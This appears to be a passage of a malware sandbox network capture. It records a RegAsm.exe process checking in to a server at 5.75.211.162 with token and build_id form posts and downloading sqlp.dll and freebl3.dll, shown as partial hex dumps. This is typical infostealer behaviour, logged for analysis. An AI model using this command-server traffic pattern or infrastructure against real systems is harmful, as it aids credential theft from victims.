2024-09-26 22:28:36 UTC	6217	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IEBFHCAKFBGDHIDHIDBKCont
2024-09-26 22:28:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	57883	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:37 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:37 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:37 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:37 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:37 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:28:37 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:28:37 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 22:28:38 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	57884	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:40 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:40 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------JJDBAEHIJKJKEBFIEGHICont
2024-09-26 22:28:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	57885	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:41 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:41 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------HCFCFHJDBKJKEBFHJEHICont
2024-09-26 22:28:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	57886	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:42 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:42 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------KKJDGDHIDBGIECBGHJDBCont
2024-09-26 22:28:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:28:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	57887	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:28:44 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:28:44 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:28:44 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:28:44 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:28:44 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-26 22:28:44 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 